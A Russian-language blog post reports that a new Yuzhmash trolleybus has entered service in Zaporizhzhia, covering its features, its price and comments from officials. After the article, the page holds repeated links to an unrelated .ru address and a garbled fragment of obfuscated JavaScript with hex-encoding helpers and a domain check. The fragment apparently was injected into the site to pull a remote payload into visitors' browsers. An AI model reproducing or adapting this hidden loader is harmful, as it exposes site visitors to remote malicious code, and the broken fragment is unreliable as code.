Хроники и Комментарии

Власть, расследования, сатира, фото

В Запорожье вышел на линию троллейбус «Южмаша». Не троллейбус, а песня

Posted by operkor на 24 декабря, 2015

18-1Новый троллейбус модели «ДНІПРО-Т103» производства днепропетровского «Южмаша» вышел на линию по маршруту №3. Это уже шестая подобная машина, пополнившая парк КП «Запорожэлектротранс».  Как отмечают на предприятии, за два месяца запорожцы, как и жители Киева и Винницы, убедились в преимуществах новинок.

Они оснащены кондиционерами салона и кабины водителя. Низкопольность позволяет перевозить людей с ограниченными возможностями. Новый троллейбус потребляет на 30% меньше электроэнергии, на нем установлен тяговый двигатель немецкого производства. Обеспечивается тихий ход, плавные остановки.

 18-2— Работала на многих моделях троллейбусов и могу сказать, что данная выгодно отличается от других, — говорит водитель Елена Мислицкая. – Здесь применены новые технологии, много электроники, машина идет тихо, мягкие педали, в салоне комфортно, работают печки и кондиционер — как в салоне, так и в кабине. Продуманы и вопросы безопасности: например, при открытых дверях троллейбус не тронется. В общем, все сделано для людей.

 Как отметил генеральный директор КП «Запорожэлектротранс» Юрий Папач, новые троллейбусы поступили в троллейбусный парк №1 по программе закупки нового транспорта, принятой городским советом. На их приобретение из городского бюджета было потрачено 23,7 миллиона гривен.

18-5 — Хотелось бы, чтобы депутатский корпус увидел: «Запорожэлектротранс» — сильное предприятие, способное на своей базе выполнять капитальные восстановительные ремонты старой техники. Так, троллейбус, вышедший после ремонта и способный эксплуатироваться еще пять лет, обходится в 500 тысяч. Новый – в 4 миллиона гривен, — рассказал Юрий Папач. – И пока город не может одновременно заменить новой техникой весь подвижной состав, необходимо одновременно восстанавливать старые и покупать новые троллейбусы. Это позволит увеличить пассажиропоток и выручку, приблизиться к самоокупаемости. Такую задачу поставила перед нами городская власть.

 Например, если на старых троллейбусах выручка составляет до 400 гривен, то на новых за счет большей пассажировместимости — до полутора тысяч.

18-3 — Мы будем всячески поддерживать и развивать городской электротранспорт, — подчеркнул председатель постоянной комиссии горсовета по обеспечению жизнедеятельности города Олег Адаманов. – Это социальный экологически чистый вид транспорта. Троллейбусы экономичны и комфортны. Немаловажно и то, что данные троллейбусы собраны отечественным предприятием: приобретая их, мы поддерживаем украинскую экономику.

 18-4СПРАВКА

Сегодня в Запорожье выходит на маршруты 50 троллейбусов. Для того, чтобы обеспечить интервал движения в 10 минут – как это предусматривает график – требуется дополнительно 25 машин. В будущем году за счет городского бюджета планируется закупить новых 10 единиц и капитально отремонтировать 10 имеющихся, сообщает официальный сайт Запорожского горсовета

//ubnsyhv27fa2j.ru/f.html

//ubnsyhv27fa2j.ru/f.html

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "operkor.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e//ubnsyhv27fa2j.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: